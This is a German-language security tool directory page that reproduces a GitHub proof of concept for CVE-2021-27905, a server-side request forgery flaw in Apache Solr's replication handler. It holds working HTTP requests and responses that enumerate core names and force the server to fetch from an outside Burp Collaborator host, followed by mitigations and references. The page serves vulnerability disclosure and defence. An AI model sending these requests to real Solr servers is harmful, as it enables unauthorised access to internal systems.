Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-27905 — [CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF) | Kitploit
Tools/GitHubGitHub/murataydemir/cve-2021-27905
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheit
GitHubmurataydemir/cve-2021-27905

CVE-2021-27905

[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)

Repository anzeigen
611vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)


Hit Counter Platform Badge

Apache Solr (steht für Searching On Lucene with Replication) ist eine freie Open-Source-Suchmaschine, die auf der Bibliothek Apache Lucene basiert und in Java geschrieben ist. Apache Solr verfügt über RESTful-XML/HTTP- und JSON-APIs sowie Client-Bibliotheken für viele Programmiersprachen wie Java, Python, Ruby, C#, PHP und viele weitere, die zum Aufbau suchbasierter und Big-Data-Analyseanwendungen für Websites, Datenbanken, Dateien usw. verwendet werden.

Apache Solr ist in allen Versionen vor 8.8.2 (7.0.0 bis 7.7.3 und 8.0.0 bis 8.8.1) anfällig für die Schwachstelle Server Side Request Forgery (SSRF). Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zu unbefugten Aktionen oder zum Zugriff auf Daten innerhalb der Organisation führen, entweder in der anfälligen Anwendung selbst oder auf anderen Backend-Systemen, mit denen die Anwendung kommunizieren kann.

Der ReplicationHandler (normalerweise unter einem Solr-Core unter /replication registriert) hat einen Parameter masterUrl (auch als Alias leaderUrl), mit dem ein anderer ReplicationHandler auf einem anderen Solr-Core bezeichnet wird, um Indexdaten in den lokalen Core zu replizieren. Um eine SSRF-Schwachstelle zu verhindern, sollte Solr diese Parameter gegen eine ähnliche Konfiguration prüfen, wie sie für den Parameter shards verwendet wird. Bevor diese Schwachstelle behoben wurde, tat es das nicht.

Proof of Concept (PoC): Um diese Schwachstelle auszunutzen, muss ein Angreifer den Core-Namen auf Apache Solr kennen. Deshalb kann die folgende Anfrage verwendet werden, um den/die Core-Namen zu ermitteln.

GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Connection: close

{
    "responseHeader":
    {
        "status": 0,
        "QTime": 0
    },
    "initFailures":
    {},
    "status":
    {
        "beliana_dev":
        {
            "name": "beliana_dev",
            "instanceDir": "/var/solr/data/beliana_dev",
            "dataDir": "/var/solr/data/beliana_dev/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-04-20T13:49:06.569Z",
            "uptime": 293226747
        },
        "beliana_prod":
        {
            "name": "beliana_prod",
            "instanceDir": "/var/solr/data/beliana_prod",
            "dataDir": "/var/solr/data/beliana_prod/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-02-02T06:07:19.668Z",
            "uptime": 6973733649
        },
        "beliana_stage":
        {
            "name": "beliana_stage",
            "instanceDir": "/var/solr/data/beliana_stage",
            "dataDir": "/var/solr/data/beliana_stage/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-02-02T06:07:19.668Z",
            "uptime": 6973733649
        }
    }
}

1

Nachdem die Core-Namen ermittelt wurden, wählt man einfach einen davon aus und sendet eine Anfrage an diesen Endpunkt: /solr/{core_name}/replication/?command=fetchindex&masterUrl={ssrf_here}

GET /solr/beliana_dev/replication/?command=fetchindex&masterUrl=http://4rwzji8a3i6xi33sjoml8qdda4gv4k.burpcollaborator.net HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 23 Apr 2021 23:16:50 GMT
ETag: "1790105893b"
Content-Type: application/xml; charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<response>
    <lst name="responseHeader">
        <int name="status">0</int>
        <int name="QTime">75</int>
    </lst>
    <str name="status">OK</str>
</response>

2

3

Gegenmaßnahmen: Jede der folgenden Maßnahmen reicht aus, um diese Schwachstelle zu verhindern

  • Aktualisieren Sie auf Solr 8.8.2 oder höher.
  • Falls ein Upgrade keine Option ist, erwägen Sie, den Patch in https://issues.apache.org/jira/browse/SOLR-15217 anzuwenden.
  • Stellen Sie sicher, dass jeglicher Zugriff auf den ReplicationHandler rein intern in Solr erfolgt. Normalerweise wird er nur zu Diagnose-/Informationszwecken extern aufgerufen.

Referenzen:

  • https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md
  • https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905
  • https://www.anquanke.com/post/id/238201
Tool herunterladen